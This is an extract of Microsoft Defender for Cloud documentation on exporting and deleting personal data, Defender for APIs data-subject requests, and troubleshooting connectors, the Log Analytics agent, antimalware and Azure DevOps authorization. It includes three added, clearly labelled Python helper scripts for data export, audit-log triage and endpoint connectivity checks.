A Defender for Cloud user assigned the role of Owner, Contributor, or Account 
Administrator can update security contact data via the Azure portal. 


A Defender for Cloud user assigned the role of Owner, Contributor, or Account 
Administrator can update their just-in-time policies. 


An Account Administrator can't edit alert incidents. An alert incident is considered 
security data and is read only. 


Deleting personal data 


A Defender for Cloud user assigned the role of Owner, Contributor, or Account 
Administrator can delete security contact data via the Azure portal. 


A Defender for Cloud user assigned the role of Owner, Contributor, or Account 
Administrator can delete the just-in-time policies via the Azure portal. 


A Defender for Cloud user can't delete alert incidents. For security reasons, an alert 
incident is considered read-only data. 


Exporting personal data 


A Defender for Cloud user assigned the role of Reader, Owner, Contributor, or Account 
Administrator can export security contact data by: 

• Copying from the Azure portal
• Executing the Azure REST API call, GET HTTP:

HTTP

GET https://<endpoint>/subscriptions/{subscriptionId}/providers/Microsoft.Security/securityContacts?api-version={api-version}

A Defender for Cloud user assigned the role of Account Administrator can export the 
just-in-time policies containing the IP addresses by: 

• Copying from the Azure portal
• Executing the Azure REST API call, GET HTTP:

HTTP

GET https://<endpoint>/subscriptions/{subscriptionId}/resourceGroups/{resourceGroup}/providers/Microsoft.Security/locations/{location}/jitNetworkAccessPolicies/default?api-version={api-version}

An Account Administrator can export the alert details by: 

• Copying from the Azure portal
• Executing the Azure REST API call, GET HTTP:

HTTP

GET https://<endpoint>/subscriptions/{subscriptionId}/providers/Microsoft.Security/alerts?api-version={api-version}

For more information, see Get Security Alerts (GET Collection).
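The three GET calls above return the personal data that Defender for Cloud holds, as JSON. The following Python script is an added example, not code from the Microsoft documentation: it builds those URLs, issues the requests with a bearer token, and reduces each response to the fields that matter for a data-subject export (security contact emails and phone number, the allowed source addresses in the just-in-time policy, and the IP address entities attached to alerts). The ARM endpoint, subscription, resource group, location and API version are placeholders, and the sample responses and their field names are constructed from the documented resource shapes, so confirm them against the API version you use.

```python
"""Added example (not from the Microsoft docs): collect the personal data that the
three GET calls above return, as one data-subject export.

Assumptions (labelled): the ARM endpoint, subscription id, resource group,
location and API version are placeholders; the response shapes are constructed
samples modelled on the documented Microsoft.Security resources. Plug a real
bearer token into http_fetch() to run it against a subscription."""
import json
import urllib.request
from typing import Callable, Dict, List

ARM = "https://management.azure.com"  # assumption: public-cloud ARM endpoint


def export_urls(subscription_id: str, resource_group: str, location: str,
                api_version: str) -> Dict[str, str]:
    """The three GET URLs from the article, with the placeholders filled in."""
    base = f"{ARM}/subscriptions/{subscription_id}"
    sec = "providers/Microsoft.Security"
    return {
        "securityContacts": f"{base}/{sec}/securityContacts?api-version={api_version}",
        "jitNetworkAccessPolicies": (
            f"{base}/resourceGroups/{resource_group}/{sec}/locations/{location}"
            f"/jitNetworkAccessPolicies/default?api-version={api_version}"),
        "alerts": f"{base}/{sec}/alerts?api-version={api_version}",
    }


def http_fetch(bearer_token: str) -> Callable[[str], dict]:
    """Return a fetch(url) callable that performs the authenticated GET."""
    def fetch(url: str) -> dict:
        req = urllib.request.Request(url, headers={"Authorization": f"Bearer {bearer_token}"})
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    return fetch


def contacts_personal_data(doc: dict) -> List[dict]:
    """Security contacts hold the only directly identifying data: emails and a phone number."""
    rows = []
    for contact in doc.get("value", []):
        props = contact.get("properties", {})
        raw = props.get("emails") or props.get("email") or ""   # older API versions use 'email'
        emails = [e.strip() for e in raw.replace(",", ";").split(";") if e.strip()]
        rows.append({"name": contact.get("name"), "emails": emails, "phone": props.get("phone")})
    return rows


def jit_personal_data(doc: dict) -> List[dict]:
    """Allowed source addresses per VM and port from a JIT policy (single policy or collection)."""
    policies = doc["value"] if "value" in doc else [doc]
    rows = []
    for policy in policies:
        for vm in policy.get("properties", {}).get("virtualMachines", []):
            for port in vm.get("ports", []):
                sources = port.get("allowedSourceAddressPrefixes") or []
                if port.get("allowedSourceAddressPrefix"):
                    sources = [port["allowedSourceAddressPrefix"]] + sources
                rows.append({"vm": vm.get("id"), "port": port.get("number"),
                             "allowedSources": sources})
    return rows


def alerts_personal_data(doc: dict) -> List[dict]:
    """IP address entities attached to alerts (attacker or source addresses)."""
    rows = []
    for alert in doc.get("value", []):
        props = alert.get("properties", {})
        ips = [e.get("address") for e in props.get("entities", [])
               if str(e.get("type", "")).lower() == "ip" and e.get("address")]
        rows.append({"name": alert.get("name"),
                     "displayName": props.get("alertDisplayName"), "ipAddresses": ips})
    return rows


def collect_export(fetch: Callable[[str], dict], urls: Dict[str, str]) -> Dict[str, List[dict]]:
    """Run the three GETs and reduce each response to its personal-data fields."""
    return {
        "contacts": contacts_personal_data(fetch(urls["securityContacts"])),
        "jit": jit_personal_data(fetch(urls["jitNetworkAccessPolicies"])),
        "alerts": alerts_personal_data(fetch(urls["alerts"])),
    }


# Constructed sample responses (not real data); addresses are RFC 5737 documentation ranges.
SAMPLE_RESPONSES = {
    "securityContacts": {"value": [{"name": "default", "properties": {
        "emails": "alice@contoso.example;bob@contoso.example", "phone": "+1-555-0100"}}]},
    "jitNetworkAccessPolicies": {"name": "default", "properties": {"virtualMachines": [{
        "id": "/subscriptions/<subscriptionId>/resourceGroups/rg-demo/providers/Microsoft.Compute/virtualMachines/vm-demo",
        "ports": [
            {"number": 22, "protocol": "*", "allowedSourceAddressPrefix": "203.0.113.10"},
            {"number": 3389, "protocol": "*",
             "allowedSourceAddressPrefixes": ["203.0.113.0/24", "198.51.100.7"]}]}]}},
    "alerts": {"value": [{"name": "alert-0001", "properties": {
        "alertDisplayName": "Constructed sample alert",
        "entities": [{"type": "ip", "address": "192.0.2.45"},
                     {"type": "host", "hostName": "vm-demo"}]}}]},
}


def sample_fetch(url: str) -> dict:
    """Offline stand-in for http_fetch(): picks the constructed response by URL."""
    for key, doc in SAMPLE_RESPONSES.items():
        if f"/{key}" in url:
            return doc
    raise KeyError(url)


if __name__ == "__main__":
    urls = export_urls("<subscriptionId>", "<resourceGroup>", "<location>", "<api-version>")
    print(json.dumps(collect_export(sample_fetch, urls), indent=2))
```

Run it as-is to see the reduced export built from the constructed responses; replace `sample_fetch` with `http_fetch(token)` and real placeholders to export from a subscription. The script keeps only the fields the article names as personal data, which is what a portability response needs, rather than dumping whole resources that also carry security configuration.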


Restricting the use of personal data for profiling or marketing without consent


A Defender for Cloud user can choose to opt out by deleting their security contact data. 
Just-in-time data is considered non-identifiable data and is retained for 30 days. 


Alert data is considered security data and is retained for two years. 


Auditing and reporting 


Audit logs of security contact, just-in-time, and alert updates are maintained in Azure 
Activity Logs.


Respond to data subject export requests for Defender for APIs

The right of data portability allows data subjects to request a copy of their personal data 
in a structured, common, electronic format that can be transmitted to another data 
controller.


Manage export and view requests 


You can manage requests to export customer or user data. 


Export customer data (Tenant administrator only) 
As a tenant administrator, you have the ability to export customer data. 
To export customer data: 


1. Send an email to D4aPIS_DSRRequests@microsoft.com that specifies the customer's 
email address in the request. 

2. The Defender for APIs team will respond with an email to the registered tenant's 
administrator email address that will ask for confirmation to export the data. 

3. Acknowledge the confirmation to export the data for the requested customer. The 
exported data will be sent to the tenant administrator's email address. 


Next steps 


What is Microsoft Defender for Cloud? 


Microsoft Defender for IoT

Microsoft Defender for IoT provides comprehensive threat detection for IoT/OT environments, with 
multiple deployment options that include cloud, on-premises, or hybrid networks.

OVERVIEW: Welcome to Defender for IoT
OVERVIEW: Modernize your SOC with OT network...
WHAT'S NEW: What's new in Defender for IoT?
CONCEPT: Secure Enterprise IoT devices
CONCEPT: Subscription billing
CONCEPT: Defender for IoT users and roles

OT network monitoring

• Microsoft Defender for IoT components
• Subscription billing
• User roles and permissions
• Device inventories
• Alerts
• Zero Trust and your OT networks
• OT threat monitoring in your SOC
• Deploy Defender for IoT for OT monitoring

Enterprise IoT network monitoring

• Enable Enterprise IoT security with Defender for Endpoint
• Manage Defender for IoT plans for Enterprise IoT security monitoring
• Discover Enterprise IoT devices with an Enterprise IoT network sensor
• Extra steps and samples for Enterprise IoT deployment
• Frequently asked questions

Defender for IoT for device builders

• Defender for IoT security agent
• What's new for the Defender for IoT security agent
• Enable Defender for IoT on your Azure IoT Hub
• Add a resource group to your IoT solution
• Create a DefenderIotMicroAgent module twin
• Install the Defender for IoT micro agent
Azure security documentation

Azure offers security advantages that support your compliance efforts, provide cost-effective 
security for your organization, and help protect your hybrid and multicloud platforms, applications, 
and data.

WHAT'S NEW: Learn about the Microsoft Entra family of multicloud identity and access solutions
CONCEPT: Back up and restore plan to protect against ransomware
HOW-TO GUIDE: Understand security coverage by the MITRE ATT&CK framework
CONCEPT: Use watchlists in Microsoft Sentinel
CONCEPT: Build a Zero Trust Foundation
CONCEPT: Protect your multicloud environment with unified security management and...
OVERVIEW: Combine SIEM and XDR to defend against modern attacks
CONCEPT: Azure Network Security

Modernize security operations

• Introduction to Azure security
• Shared responsibilities for cloud computing
• Protect against ransomware

Data security & governance, risk, and compliance

• Introduction to information protection and governance in Microsoft 365
• Azure Policy service

Secure identities and access

• Securing identity with Zero Trust
• Securing privileged access
• Building apps with a Zero Trust approach to identity
• Deploy an information protection solution with Microsoft Purview

Security guidance for each phase of your cloud migration journey

Strategy and planning
Define business justification and expected outcomes of adoption
• Define a security strategy
• Envision a security end state
• Develop a cloud adoption plan

Continued learning
Discover learning paths that help you improve your security in the cloud
• Information protection and governance in Microsoft 365
• Secure your cloud applications in Azure
• Implement perimeter security

Implementation and operation
Migrate and modernize security operations management
• Application migration, modernization, and innovation
• Cloud management for operations team and architects
• Unlock new technical skills and expand capabilities

Additional security guidance

Cloud architecture
Design, build, and continuously improve your cloud architecture
• Security architecture design
• Security pillar of your architecture
• Microsoft Cybersecurity Reference Architectures

Microsoft Learn training
If you're new to security, build your skills with Microsoft Learn training

Azure Security Benchmark
Best practices and recommendations to secure your cloud deployments

Microsoft Security Best Practices
Collection of best practices that provide clear actionable guidance for security related 
decisions, includes Azure and...

Microsoft Cloud Adoption Framework for Azure
Secure methodology designed to help cloud architects and business decision makers 
create and implement securit...

Azure Well-Architected Framework
Design principles for a securely architected system hosted on cloud or on-premises datacenters

Secure development
Learn how to develop and deploy secure applications on Azure with our sample apps, 
best practices, and guidance

Security services and capabilities

Microsoft Sentinel
See and stop threats before they cause harm
• Overview
• Onboard Microsoft Sentinel
• Learn: Cloud-native security operations with Microsoft Sentinel

Azure key management
Key management solutions in Azure
• Key management in Azure
• Choosing a key management solution
• Azure Key Vault
• Azure Managed HSM
• Azure Dedicated HSM
• Azure Payment-HSM

Microsoft Defender for Cloud
Unify security management and advanced threat protection across hybrid cloud workloads
• Overview
• Protect your resources
• Learn: Mitigate threats using Microsoft Defender for Cloud

Microsoft Defender for Cloud Apps
Cloud Access Security Broker (CASB) that operates on multiple clouds
• Overview
• Get started
• Detect and manage suspicious activity
• Learn: Secure your cloud apps and services

Azure security fundamentals
For every phase of your cloud journey, learn how to secure your cloud solutions on Azure

Azure Architecture Center
A set of guiding tenets that can be used to protect your applications and data from threats

Microsoft Defender for Identity
Improve security of hybrid environments from cyber attacks and insider threats
• Overview
• Deploy Microsoft Defender for Identity with Microsoft 365 Defender
• Learn: Defend against attacks

Microsoft Defender for IoT
Threat detection for IoT/OT environments
• Overview
• Get started with Defender for IoT
• Learn: Enhance IoT solution security

Azure Information Protection
Control and secure emails, documents, and sensitive data
• Overview
• Deploying the client
• Discovering your sensitive content

Microsoft Entra ID
Multi-tenant, cloud-based identity and access management service
• Overview
• Security operations guide
• Learn: Secure Microsoft Entra users with Multi-Factor Authentication

Microsoft 365 Defender
Security solutions that protect your enterprise across attack surfaces
• Overview
• Get started
• Security operations guide
Microsoft Defender for Cloud Troubleshooting Guide

Article • 06/18/2023

This guide is for information technology (IT) professionals, information security analysts, 
and cloud administrators whose organizations need to troubleshoot Defender for Cloud 
related issues.


Tip

When you're facing an issue or need advice from our support team, the Diagnose 
and solve problems section of the Azure portal is a good place to look for solutions:

[Screenshot: Microsoft Defender for Cloud > Diagnose and solve problems. The Common problems pane lists 
categories, each with a Troubleshoot link: Microsoft Defender Features (Adaptive Application Control (AAC), 
Just-in-time Access (JIT), File Integrity Monitoring (FIM), Vulnerability Assessment...); Portal and UI; 
Recommendations operations and management (exemptions, Enforce or Deny, custom recommendations, compliance 
assignments...); Security Alerts Investigation; Onboarding (onboarding or offboarding ASC); Pricing, Billing 
and Usage; Recommendations remediation; Settings and configurations issues.]


Use the Audit Log to investigate issues

The first place to look for troubleshooting information is the Audit Log records 
for the failed component. In the audit logs, you can see details including: 

• Which operations were performed
• Who initiated the operation
• When the operation occurred
• The status of the operation

The audit log contains all write operations (PUT, POST, DELETE) performed on your 
resources, but not read operations (GET).
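To turn the four facts above (operation, caller, time, status) into a quick triage over a batch of Activity Log records, the following Python script is an added example, not Microsoft's own tooling. It keeps only the audited write operations, sorts them newest first and flags failures caused by a resource lock, the situation the connector section below describes for a connector that won't delete. The records are constructed samples in the shape the Activity Log API and `az monitor activity-log list` return; ScopeLocked is the Azure Resource Manager error code a lock produces, and the remaining field names are assumptions to verify against your own export.

```python
"""Added example (not from the Microsoft docs): triage Azure Activity Log records for
a failed Defender for Cloud component, pulling out the four facts the article lists
(operation, caller, time, status) for write operations only.

Assumptions (labelled): the records are constructed samples in the shape returned by
the Activity Log API / `az monitor activity-log list` (operationName, caller,
eventTimestamp, status, httpRequest, properties.statusMessage). ScopeLocked is the
ARM error code returned when a resource lock blocks a write or delete."""
import json
from typing import Dict, List

WRITE_METHODS = {"PUT", "POST", "DELETE", "PATCH"}
WRITE_SUFFIXES = ("/write", "/delete", "/action")


def operation_name(entry: dict) -> str:
    op = entry.get("operationName", "")
    return op.get("value", "") if isinstance(op, dict) else str(op)


def is_write_operation(entry: dict) -> bool:
    """PUT/POST/DELETE are audited; reads (GET, .../read) never appear in the audit log."""
    method = (entry.get("httpRequest") or {}).get("method", "").upper()
    if method:
        return method in WRITE_METHODS
    return operation_name(entry).lower().endswith(WRITE_SUFFIXES)


def lock_error(entry: dict) -> bool:
    """True when the failure was caused by a resource lock (the connector-deletion case)."""
    message = (entry.get("properties") or {}).get("statusMessage", "")
    try:
        code = json.loads(message).get("error", {}).get("code", "")
    except (ValueError, AttributeError):
        code = ""
    return code == "ScopeLocked" or "ScopeLocked" in message


def summarize(entry: dict) -> Dict[str, object]:
    status = entry.get("status", {})
    status = status.get("value", "") if isinstance(status, dict) else str(status)
    return {
        "operation": operation_name(entry),
        "caller": entry.get("caller"),
        "when": entry.get("eventTimestamp"),
        "status": status,
        "resource": entry.get("resourceId"),
        "lockError": status == "Failed" and lock_error(entry),
    }


def triage(entries: List[dict]) -> List[Dict[str, object]]:
    """Summaries of the audited write operations, newest first, failures flagged."""
    rows = [summarize(e) for e in entries if is_write_operation(e)]
    return sorted(rows, key=lambda r: r["when"] or "", reverse=True)


def failures(entries: List[dict]) -> List[Dict[str, object]]:
    return [r for r in triage(entries) if r["status"] == "Failed"]


# Constructed sample records (not real tenant data).
SAMPLE_ENTRIES = [
    {"operationName": {"value": "Microsoft.Security/securityConnectors/write"},
     "caller": "alice@contoso.example", "eventTimestamp": "2023-06-18T09:00:00Z",
     "status": {"value": "Succeeded"}, "httpRequest": {"method": "PUT"},
     "resourceId": "/subscriptions/<subscriptionId>/resourceGroups/rg-connectors/providers/Microsoft.Security/securityConnectors/aws-prod"},
    {"operationName": {"value": "Microsoft.Security/securityConnectors/delete"},
     "caller": "bob@contoso.example", "eventTimestamp": "2023-06-18T10:15:00Z",
     "status": {"value": "Failed"}, "httpRequest": {"method": "DELETE"},
     "resourceId": "/subscriptions/<subscriptionId>/resourceGroups/rg-connectors/providers/Microsoft.Security/securityConnectors/aws-prod",
     "properties": {"statusCode": "Conflict", "statusMessage": json.dumps({"error": {
         "code": "ScopeLocked",
         "message": "The scope cannot perform delete operation because the following "
                    "scope(s) are locked: '/subscriptions/<subscriptionId>/resourceGroups/rg-connectors'."}})}},
    {"operationName": {"value": "Microsoft.Security/locations/jitNetworkAccessPolicies/initiate/action"},
     "caller": "alice@contoso.example", "eventTimestamp": "2023-06-18T08:30:00Z",
     "status": {"value": "Succeeded"}, "httpRequest": {"method": "POST"}},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_ENTRIES):
        flag = " (blocked by a resource lock)" if row["lockError"] else ""
        print(f'{row["when"]} {row["status"]:9} {row["caller"]} {row["operation"]}{flag}')
```

Feed it the JSON you export from the Activity Log for the subscription and time window of the failure; the `failures()` list is the short answer to "who did what, when, and why did it fail", and a `lockError` of True on a connector delete points straight at the lock the connector section mentions.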


Troubleshooting the native multicloud connector

Defender for Cloud uses connectors to collect monitoring data from AWS accounts and 
GCP projects. If you're experiencing issues with the connector or you don't see data 
from AWS or GCP, we recommend that you review these troubleshooting tips: 

Common connector issues: 

• Make sure that the subscription associated with the connector is selected in the 
  subscriptions filter, located in the Directories + subscriptions section of the Azure 
  portal.
• Standards should be assigned on the security connector. To check, go to the 
  Environment settings in the Defender for Cloud left menu, select the connector, 
  and select Settings. There should be standards assigned. You can select the three 
  dots to check if you have permissions to assign standards.
• The connector resource should be present in Azure Resource Graph (ARG). Use the 
  following ARG query to check:

  resources | where ['type'] =~ "microsoft.security/securityconnectors"

• Make sure that sending Kubernetes audit logs is enabled on the AWS or GCP 
  connector so that you can get threat detection alerts for the control plane.
• Make sure that Azure Arc and the Azure Policy Arc extension were installed 
  successfully.
• Make sure that the agent is installed on your Elastic Kubernetes Service (EKS) 
  clusters. You can install the agent with the "Azure Policy add-on for Kubernetes 
  should be installed and enabled on your clusters" or "Azure Policy extension for 
  Kubernetes should be installed and enabled on your clusters" recommendations. 
  Download the script provided in the recommendation and run it on your cluster. 
  The recommendation should disappear within an hour of when the script is run.
• If you're experiencing issues with deleting the AWS or GCP connector, check if you 
  have a lock (in this case there might be an error in the Azure Activity log, hinting at 
  the presence of a lock).
• Check that workloads exist in the AWS account or GCP project.

AWS connector issues: 

• Make sure that the CloudFormation template deployment completed successfully.
• You need to wait at least 12 hours since the AWS root account was created.
• Make sure that EKS clusters are successfully connected to Arc-enabled Kubernetes.
• If you don't see AWS data in Defender for Cloud, make sure that the AWS 
  resources required to send data to Defender for Cloud exist in the AWS account.

GCP connector issues: 

• Make sure that the GCP Cloud Shell script completed successfully.
• Make sure that GKE clusters are successfully connected to Arc-enabled Kubernetes.
• Make sure that Azure Arc endpoints are in the firewall allowlist. The GCP connector 
  makes API calls to these endpoints to fetch the necessary onboarding files.
• If the onboarding of GCP projects failed, make sure you have the 
  "compute.regions.list" permission and the Azure AD permission to create the service 
  principal used as part of the onboarding process. Make sure that the GCP 
  resources WorkloadIdentityPoolId, WorkloadIdentityProviderId, and 
  ServiceAccountEmail are created in the GCP project.


Troubleshooting the Log Analytics agent

Defender for Cloud uses the Log Analytics agent to collect and store data. The 
information in this article represents Defender for Cloud functionality after transition to 
the Log Analytics agent. 

Alert types: 

• Virtual Machine Behavioral Analysis (VMBA)
• Network Analysis
• SQL Database and Azure Synapse Analytics Analysis
• Contextual Information

Depending on the alert type, customers can gather the information needed to 
investigate the alert from the following sources: 

• Security logs in the Virtual Machine (VM) event viewer in Windows
• AuditD in Linux
• The Azure activity logs and the enabled diagnostic logs on the attacked resource

Customers can share feedback on the alert description and relevance. Navigate to the 
alert itself, select the Was This Useful button, select the reason, and then enter a 
comment to explain the feedback. We consistently monitor this feedback channel to 
improve our alerts.


Check the Log Analytics agent processes and versions

Just like Azure Monitor, Defender for Cloud uses the Log Analytics agent to collect 
security data from your Azure virtual machines. After data collection is enabled and the 
agent is correctly installed on the target machine, the HealthService.exe process should 
be running. 

Open the services management console (services.msc) to make sure that the Log 
Analytics agent service is running, as shown below: 

[Screenshot: Services console with the Microsoft Monitoring Agent service shown as Running, 
startup type Automatic, logged on as Local System.]

To see which version of the agent you have, open Task Manager, in the Processes tab 
locate the Log Analytics agent Service, right-click on it and select Properties. In the 
Details tab, look at the file version as shown below: 

[Screenshot: Task Manager Details tab and the Properties dialog for Microsoft Monitoring Agent Service, 
showing File version 8.0.11049.0 and Original filename HealthService.exe.]


Log Analytics agent installation scenarios

There are two installation scenarios that can produce different results when installing 
the Log Analytics agent on your computer. The supported scenarios are: 

• Agent installed automatically by Defender for Cloud: You can view the alerts in 
  Defender for Cloud and Log search. You'll receive email notifications to the email 
  address that was configured in the security policy for the subscription the resource 
  belongs to.
• Agent manually installed on a VM located in Azure: in this scenario, if you're 
  using agents downloaded and installed manually prior to February 2017, you can 
  view the alerts in the Defender for Cloud portal only if you filter on the 
  subscription the workspace belongs to. If you filter on the subscription the 
  resource belongs to, you won't see any alerts. You'll receive email notifications to 
  the email address that was configured in the security policy for the subscription 
  the workspace belongs to.

Note

To avoid the behavior explained in the second scenario, make sure you download 
the latest version of the agent.


Monitoring agent network connectivity issues

For agents to connect to and register with Defender for Cloud, they must have access to 
the DNS addresses and network ports for Azure network resources. 

• When you use proxy servers, you need to make sure that the appropriate proxy 
  server resources are configured correctly in the agent settings.
• You need to configure your network firewalls to permit access to Log Analytics.

The Azure network resources are: 

Agent Resource                  Ports   Bypass HTTPS inspection
*.ods.opinsights.azure.com      443     Yes
*.oms.opinsights.azure.com      443     Yes
*.blob.core.windows.net         443     Yes
*.azure-automation.net          443     Yes

If you're having trouble onboarding the Log Analytics agent, make sure to read how to 
troubleshoot Operations Management Suite onboarding issues.
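The table above is the allow-list; the following Python script is an added example (not from the Microsoft documentation) for confirming from an agent host that each endpoint resolves, accepts a TCP 443 connection and completes a TLS handshake, and for spotting HTTPS inspection, which the table says these endpoints must bypass. It assumes the wildcard in the opinsights hosts is the workspace id and that the blob and automation host names, which are account-specific, are supplied by the caller; the inspection check is a heuristic that treats a leaf certificate issued by anything other than a Microsoft or DigiCert CA as a sign that a proxy re-signed the session.

```python
"""Added example (not from the Microsoft docs): check that a Log Analytics agent host
can reach the endpoints in the table above on TCP 443 and that the TLS session is not
being intercepted.

Assumptions (labelled): the wildcard in *.ods / *.oms.opinsights.azure.com is the
workspace id; blob and automation host names are account-specific and are passed in
by the caller. The issuer heuristic assumes Microsoft-operated endpoints present
certificates issued by Microsoft or DigiCert CAs; any other issuer on the leaf
certificate usually means an HTTPS-inspecting proxy re-signed the session."""
import socket
import ssl
import sys
from typing import Callable, Dict, Iterable, List

PORT = 443
REQUIRED_PATTERNS = [  # from the article's table
    "*.ods.opinsights.azure.com", "*.oms.opinsights.azure.com",
    "*.blob.core.windows.net", "*.azure-automation.net",
]
TRUSTED_ISSUER_ORGS = ("Microsoft", "DigiCert")  # assumption, see the module docstring


def hosts_to_test(workspace_id: str, extra_hosts: Iterable[str] = ()) -> List[str]:
    """Expand the opinsights wildcards with the workspace id; add caller-supplied hosts."""
    hosts = [p.replace("*", workspace_id) for p in REQUIRED_PATTERNS if "opinsights" in p]
    return hosts + list(extra_hosts)


def tls_issuer(host: str, port: int = PORT, timeout: float = 5.0) -> Dict[str, str]:
    """Resolve, connect and complete a TLS handshake; return the leaf certificate's issuer."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            cert = tls.getpeercert()
    return {key: value for rdn in cert.get("issuer", ()) for key, value in rdn}


def looks_inspected(issuer: Dict[str, str]) -> bool:
    """Heuristic: a leaf cert not issued by a Microsoft/DigiCert CA points to TLS inspection."""
    org = issuer.get("organizationName", "")
    return not any(trusted in org for trusted in TRUSTED_ISSUER_ORGS)


def check_host(host: str, connect: Callable[[str], Dict[str, str]] = tls_issuer) -> Dict[str, object]:
    """Classify the failure stage (dns, tcp, tls) or report the issuer on success."""
    result = {"host": host, "ok": False, "stage": None, "issuer": None, "inspected": None, "error": None}
    try:
        issuer = connect(host)
    except socket.gaierror as exc:          # name did not resolve
        result.update(stage="dns", error=str(exc))
    except ssl.SSLError as exc:             # handshake failed (e.g. proxy cert not trusted)
        result.update(stage="tls", error=str(exc))
    except OSError as exc:                  # refused, timed out, firewall drop
        result.update(stage="tcp", error=str(exc))
    else:
        result.update(ok=True, stage="tls", issuer=issuer, inspected=looks_inspected(issuer))
    return result


def check_all(hosts: Iterable[str],
              connect: Callable[[str], Dict[str, str]] = tls_issuer) -> List[Dict[str, object]]:
    return [check_host(h, connect) for h in hosts]


if __name__ == "__main__":
    # usage: python check_agent_endpoints.py <workspace-id> [extra host ...]
    workspace = sys.argv[1] if len(sys.argv) > 1 else "<workspace-id>"
    for r in check_all(hosts_to_test(workspace, sys.argv[2:])):
        verdict = "OK" if r["ok"] else f"FAIL at {r['stage']}: {r['error']}"
        if r["ok"] and r["inspected"]:
            verdict += f" but issuer {r['issuer'].get('organizationName')!r} suggests HTTPS inspection"
        print(f"{r['host']}: {verdict}")
```

Run it on the VM itself, not from your workstation, because the agent's path through proxies and firewalls is what needs testing. A failure at the `dns` stage points at name resolution, `tcp` at a firewall or NSG, and `tls` at a proxy whose certificate the host does not trust; an `OK` with `inspected` set means the connection works but the proxy is decrypting it, which is exactly what the "Bypass HTTPS inspection" column says to exclude.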


Antimalware protection isn't working properly

The guest agent is the parent process of everything the Microsoft Antimalware 
extension does. When the guest agent process fails, the Microsoft Antimalware 
protection that runs as a child process of the guest agent may also fail. 

Here are some other troubleshooting tips: 

• If the target VM was created from a custom image, make sure that the creator of 
  the VM installed the guest agent.
• If the target is a Linux VM, then installing the Windows version of the antimalware 
  extension will fail. The Linux guest agent has specific OS and package 
  requirements.
• If the VM was created with an old version of the guest agent, the old agents might not 
  have the ability to auto-update to the newer version. Always use the latest version 
  of the guest agent when you create your own images.
• Some third-party administration software may disable the guest agent, or block 
  access to certain file locations. If third-party administration software is installed on 
  your VM, make sure that the antimalware agent is on the exclusion list.
• Make sure that firewall settings and Network Security Group (NSG) rules aren't blocking 
  network traffic to and from the guest agent.
• Make sure that there are no Access Control Lists (ACLs) that prevent disk access.
• The guest agent requires sufficient disk space in order to function properly.

By default the Microsoft Antimalware user interface is disabled, but you can enable the 
Microsoft Antimalware user interface on Azure Resource Manager VMs.


Troubleshooting problems loading the dashboard

If you experience issues loading the workload protection dashboard, make sure that the 
user that first enabled Defender for Cloud on the subscription and the user that wants to 
turn on data collection have the Owner or Contributor role on the subscription. If that is 
the case, users with the Reader role on the subscription can see the dashboard, alerts, 
recommendations, and policy.


Troubleshoot Azure DevOps Organization connector issues

The Unable to find Azure DevOps Organization error occurs when you create an Azure 
DevOps Organization (ADO) connector and the incorrect account was signed in and 
granted access to the Microsoft Security DevOps App. This can also result in the error 
Failed to create Azure DevOps connector. Error: "Unable to find Azure DevOps 
organization : OrganizationX in available organizations: Organization1, Organization2, 
Organization3." 

It is important to know which account you are logged in to when you authorize the 
access, as that will be the account that is used. Your account can be associated with the 
same email address but also associated with different tenants. 

You should check which account you are currently logged in on and ensure that the 
right account and tenant combination is selected.


[Screenshot: the Microsoft Security DevOps app requesting Azure DevOps permissions from the signed-in account 
(connie.wilson@contoso.com in the example), listing scopes such as Identity (read), Service hooks (read and write), 
Work items (read and write), Notifications (diagnostics), Audit Read Log and Audit Manage Streams, with a note 
that authorizations can be managed on your profile page and an Accept button.]

To change your current account: 

1. Select profile page.
2. On your profile page, select the drop-down menu to select another account.

[Screenshot: Azure DevOps profile page (Edit profile) with the directory drop-down and the 
Authorizations section.]


The first time you authorize the Microsoft Security application, you are given the ability 
to select an account. However, each time you log in after that, the page defaults to the 
logged-in account without giving you the chance to select an account. 

To change the default account: 

1. Sign in and select the same tenant you use in Azure from the drop-down menu.
2. Create a new connector, and authorize it. When the pop-up page appears, ensure 
   it shows the correct tenant.

If this process does not fix your issue, you should revoke Microsoft Security DevOps's 
permission from all tenants in Azure DevOps and repeat the above steps. You should 
then be able to see the authorization pop-up again when authorizing the connector.


[Screenshot: the Microsoft Security DevOps (Microsoft) entry under Authorizations in Azure DevOps, listing the 
granted scopes: identities and groups; service hook subscriptions; work items and queries; build artifacts and 
queuing builds; source code, commits, branches, pull requests and code reviews; pull request comment threads; 
agent pools, queues and jobs; feeds and packages; installed extensions; licensing entitlements; release artifacts; 
secure files; task groups; variable groups; service endpoints; projects and teams; symbols; user, group, scope 
and membership information; users and their licenses; notification diagnostics; audit log and audit streams.]


Contacting Microsoft Support

You can also find troubleshooting information for Defender for Cloud at the Defender 
for Cloud Q&A page. If you need further troubleshooting, you can open a new support 
request using the Azure portal as shown below: 

[Screenshot: Azure portal Help + support page with the Create a support request and Choose the right 
support plan options, the Service health status ("No Azure service issue detected"), and the 
"Have an issue with your resource?" troubleshoot prompt.]


See also

In this page, you learned about troubleshooting steps for Defender for Cloud. To learn 
more about Microsoft Defender for Cloud: 

• Learn how to manage and respond to security alerts in Microsoft Defender for 
  Cloud
• Alert validation in Microsoft Defender for Cloud
• Review common questions about using Microsoft Defender for Cloud


